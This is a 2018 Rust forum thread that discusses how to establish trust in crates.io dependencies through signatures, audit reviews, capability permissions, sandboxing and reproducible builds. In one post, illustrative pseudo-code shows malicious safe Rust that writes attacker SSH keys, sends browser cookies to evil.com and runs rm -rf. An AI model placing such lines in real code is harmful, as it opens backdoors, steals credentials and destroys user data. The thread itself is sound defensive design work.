[pre-pre-rfc?] Solving Crate Trust

bascule · 2018-01-08T16:29:57.126Z

I thought this was an interesting solution to the problem, although I’m not sure about the actual practicality:

GitHub

kmcallister/launch-code

launch-code - Cryptographic signatures for auditing unsafe code in Rust

jmst · 2018-01-08T22:17:53.657Z

It seems to me that the most practical solution is to:

Sign packages and include the public key in either Cargo.toml or an auxiliary file
Also have crates.io host signed review messages, that would be produced when e.g. the Firefox team or the Rust libs team reviews a version of a crate and finds it non-malicious
Provide in either Cargo.toml or local Cargo configuration a way to provide a list of trusted public keys: the build will fail if there is any dependency crate with no usable versions that are not either authored or reviewed by any of the keys. The solution then is of course to add your own key to the trusted keys, review the crate code and sign a review message (which would be automatically uploaded to crates.io unless the user opts out)
Have Cargo use trusted crate versions even if they aren’t the last version
Provide some way of mass trusting the keys of prominent developers, and maybe have a “web of trust” system where developers can trust each other, and users can choose to also trust those transitively trusted keys (this probably shouldn’t be used for important software like Firefox)

The idea of sandboxing untrusted crates seems instead much less promising since Rust has not really been designed for that and there are have been soundness holes as well as probably vulnerable unsafe code. That said, it’s still better than nothing, so it could be worth exploring.

Also I think trust needs to be (at least mainly) binary and not probabilistic, since if you care about it you need to be sure that the code is not malicious, so there is no difference between 90% and 0% trust.

BTW, we should use quantum-resistant signatures and keys (SIDH-based?) along with traditional EC crypto if possible, so we don’t have to throw away all crate reviews if quantum computers show up.

kornel · 2018-01-09T00:05:16.344Z

It may be worth mentioning that not-unsafe Rust code using only trusted packages can still cause harm:

fs::File::create(".ssh/authorized_keys")?.write_all(let_attackers_in);

curl.send("http://evil.com", file::get(browser_cookie_db_path));

Command::new("rm").arg("-rf")

etc. not-unsafe Rust is not safe at all, so audits focused on unsafe blocks aren’t going to catch malicious packages.

Manishearth · 2018-01-09T04:38:21.165Z

I think this really combines all the threat models into one. There are different things you wish to trust, and different levels of trust. Trust isn’t a simple binary, it’s multidimensional.

The idea of sandboxing untrusted crates seems instead much less promising since Rust has not really been designed for that and there are have been soundness holes as well as probably vulnerable unsafe code. That said, it’s still better than nothing, so it could be worth exploring.

Again, you’re missing the threat model, sandboxing untrusted crates is for catching malicious build scripts, not mistakes.

Manishearth · 2018-01-09T04:38:58.126Z

kornel:

It may be worth mentioning that not-unsafe Rust code using only trusted packages can still cause harm:

Yeah, to be clear, for unsafe code the threat model involved is mistakes, not outright malicious code. Outright malicious code is what the “allowed to be used at all” capability is for.

dhardy · 2018-01-09T19:50:53.032Z

kornel:

There’s no link between code on GitHub and code in the package. Publishing innocent code on GitHub and malicious code in the package file can fool people reviewing the repo (also a really safe package can become malicious at any later time).

This is an important point. When I type cargo publish, it’s the code in my local directory which gets used, not the code in some public repository. Maybe instead publish should take a commit on a pulbic GitHub repo, clone that repo into a GH team belonging to the Cargo team, make a signed tag, build from that, and then sign the build (all on a build server).

H2CO3 · 2018-01-10T17:20:04.585Z

Very nice pre-pre-RFC, although I don’t understand why opt-out/allow-by-default/blacklist for many capabilities instead of opt-in/deny-by-default/whitelist? Given that we are explicitly talking about a security/safety/trust problem here, shouldn’t we just be extra vigilant and as strict as possible?

For example, I would very much like "allowed to use unsafe" to be denied by default. In my experience, many crates that use unsafe really don’t need the unsafe. Some programmers use it for “optimization” purposes; others are C programmers trying to avoid learning how to borrowck; and very few are actual, legitimate users who are trying to call into a C library or write a safe primitive to build on.

Related: I am currently working on a project that will explicitly advertise itself as "transitively free of unsafe". For now, it means that I have gone through every dependency of my project one-by-one, recursively, and verified if/how they use unsafe in any of the functions/types I am using from them. I’ve also submitted pull requests that remove unnecessary unsafes from several such depended-upon-by-me crates in the course. In the future, if I update any of these crates, I will need to go through it again.

To mitigate this, I think many of us would appreciate some sort of tooling, e.g. cargo safe, that would allow one to query and track uses of unsafe in the transitive dependencies.

Manishearth · 2018-01-10T17:40:45.644Z

H2CO3:

Given that we are explicitly talking about a security/safety/trust problem here, shouldn’t we just be extra vigilant and as strict as possible?

Because we don’t know which security problem the user is concerned about; it is up to them to pick. This RFC is providing a framework that lets users decide what issues they care about and then audit for those.

Also, if this is built into cargo, capabilities being opt-out is a breaking change.

For example, I would very much like “allowed to use unsafe” to be denied by default. In my experience, many crates that use unsafe really don’t the need the unsafe.

This does not match up with my experience. Plenty of crates need it, especially FFI. There are amateurish crates out there, sure, but that’s a problem anyway, you should be picking good crates.

To mitigate this, I think many of us would appreciate some sort of tooling, e.g. cargo safe, that would allow one to query and track uses of unsafe in the transitive dependencies.

This is … basically what is being proposed here? A superset solution.

vorner · 2018-01-10T18:21:25.273Z

I see this might be useful (I’m not really trying to decide if this exact set of capabilities is best, I mean the general idea). I’m a bit worried about the initial scope ‒ would it make sense to start small first?

Also, this is just the first step. This tells me which dependencies I might want to audit, but it doesn’t help me with the audit itself. I understand it is not the goal, but maybe it would be worth stating explicitly as non-goal (when I read the title, I kind of expected this to be addressed as well).

I also think some kind of signatures/reviews/audits published to crates.io (or elsewhere) could help with the other half ‒ at least for individual developers without the means to audit everything they have ‒ firefox has a large team and the resources. If I want to do my own little program, I want it to be safe, but I don’t have the means to check everything myself. But yes, that’s probably different part of the puzzle.

bjorn3 · 2018-01-11T18:13:36.423Z

canndrew:

Users are able to endorse each other. I can tell crates.io that I trust @bob by b, then anyone who trusts me by x and would otherwise trust @bob by y would now trust @bob by max(y, x * b). (Or maybe some other formula. We’d need to do the math / game theory to work out what the correct probability would be)

Maybe use google’s pagerank

kornel · 2018-01-11T20:00:11.390Z

Another failure mode:

ZDNet

Firms buy popular Chrome extensions to inject malware, ads | ZDNet

Are adware companies offering lucrative deals to acquire popular Chrome extensions -- and the trust of an extension's users?

This could potentially happen with Cargo — author of a popular crate may decide to sell it or accept a lucrative deal to “monetize” it. This means that even age and popularity of a crate is not a guarantee the crate won’t become malware

mark-i-m · 2018-01-11T20:33:17.729Z

Trust is not transitive. In the end, it will probably come down to auditing and community endorsement, I think…

taralx · 2018-01-12T02:27:05.202Z

My biggest concern with this is that crates often seem to extend their functionality and thus acquire additional dependencies that I do not want and will not use. The ergonomics around splitting the functionality of a crate is not great right now.

gavento · 2018-01-16T22:37:16.607Z

taralx:

My biggest concern with this is that crates often seem to extend their functionality and thus acquire additional dependencies that I do not want and will not use. The ergonomics around splitting the functionality of a crate is not great right now.

Would cargo features help with optional functionalities and their dependencies? It would be an additional aspect complicating the RFC, but it might be worth mentioning.

HaronK · 2018-01-16T23:39:36.334Z

About a year ago I have read a post about reproducibility of the rustc releases (there is also an issue for this). I think the same approach applied to the crates.io libraries can make them more secure. At least anyone would be able to reproduce a build and compare it with one from the crates.io (or it can be done automatically).

I know we depend on LLVM but as it was discussed in the post I mentioned above everything can be solved.

bascule · 2018-01-17T00:19:34.306Z

dhardy:

This is an important point. When I type cargo publish, it’s the code in my local directory which gets used, not the code in some public repository. Maybe instead publish should take a commit on a pulbic GitHub repo, clone that repo into a GH team belonging to the Cargo team, make a signed tag, build from that, and then sign the build (all on a build server).

There are a few challenges with this, namely that as far as I understand releasing a crate right now involves building it, which may involve procedural macros, and in that case it’s tantamount to RCE. It’d be nice if such a build system wasn’t a terrifying single point of compromise.

I covered some ways to address this, specifically through the use of reproducible builds and scoped credentials, in my Rust Bay Area Meetup talk on Macaroons last year:

air.mozilla.org

Rust Meetup February 2017

Rust Meetup for February 2017

(start at 32:15)

matejcik · 2018-03-12T15:00:44.496Z

hello, I’m looking into this as a possible topic for my masters thesis. I’d like to do something like an overview of the whole problem (“trust in third-party libraries and dependencies”), with applicability and implementation specifically for Rust and crates.io.

I’m at the stage where I’m not even entirely sure what the end result would look like. At the moment, the following features look interesting:

a mechanism to tie a published package on crates.io to a specific git(hub) commit (which can be signed, and this signature maybe used in place of, or in addition to, a separate crate signature?)
a mechanism to attach third-party signatures to this thing - for “trusted audits” that @kornel talked about
something about auditing subsequent commits, so that it’s easier to upgrade a package from a known good version
TUF-inspired mechanism(s) that would ensure integrity of the whole scheme, key revocation, etc.

I’m mostly thinking about the trust model and the general “allowed to exist” capability; more granular capabilities could maybe piggyback on the same basic underlying scheme (audit related to unsafe code only? to code harm overall? build scripts?), but I specifically don’t aim to solve granular enforcement, such as sandboxing.

I’m still trying to connect all the dots and form a more complete picture of the problem. I’ve been reading about TUF (and https://github.com/rust-lang/crates.io/issues/75) and similar. Are there more resources and/or related discussions that you could point me towards?

Manishearth · 2018-03-12T18:06:28.083Z

hello, I’m looking into this as a possible topic for my masters thesis

This sounds great! Let me know how I can help!

matejcik:

a mechanism to tie a published package on crates.io to a specific git(hub) commit (which can be signed, and this signature maybe used in place of, or in addition to, a separate crate signature?)

FWIW @withoutboats is working on stuff in this space already

but I specifically don’t aim to solve granular enforcement, such as sandboxing.

I think that’s fine – I think having the ability to specify granular capabilities is important, but a different tool can enforce the capabilities. So your tool may allow users to specify/allow/deny various sandboxing-related capabilities, and we can have the build system query it to actually sandbox things.

I’m mostly thinking about the trust model and the general “allowed to exist” capability; more granular capabilities could maybe piggyback on the same basic underlying scheme (audit related to unsafe code only? to code harm overall? build scripts?),

I suspect it will be easier to do in the other direction – solve the problem for the general notion of capabilities (In general I think trust is very multidimensional), and then “allowed to exist” and “allowed to unsafe” are specific variants of this. Enforcing “allowed to unsafe” can be done later, but having some way of specifying simultaneously “I am okay with this crate but it is not allowed to use unsafe”, which can later interface with a tool that forbids unsafe – would be nice.

Are there more resources and/or related discussions that you could point me towards?

I don’t know where boats’ crates.io signature stuff is, but TUF and that are the only two things I can think of.

notriddle · 2018-04-16T19:41:18.234Z

Manishearth:

matejcik:

a mechanism to tie a published package on crates.io to a specific git(hub) commit (which can be signed, and this signature maybe used in place of, or in addition to, a separate crate signature?)

FWIW @withoutboats is working on stuff in this space already

This is probably the worst attack model Cargo has right now, since it means people trying to audit their crates can easily end up not actually auditing the code they’re using (like that NPM-related article). Ideally, crates.io would refuse to publish a crate if it links to GitHub but doesn’t have the same code as the repo it links to.

Manishearth · 2019-03-25T08:29:28.424Z

This topic was automatically closed 90 days after the last reply. New replies are no longer allowed.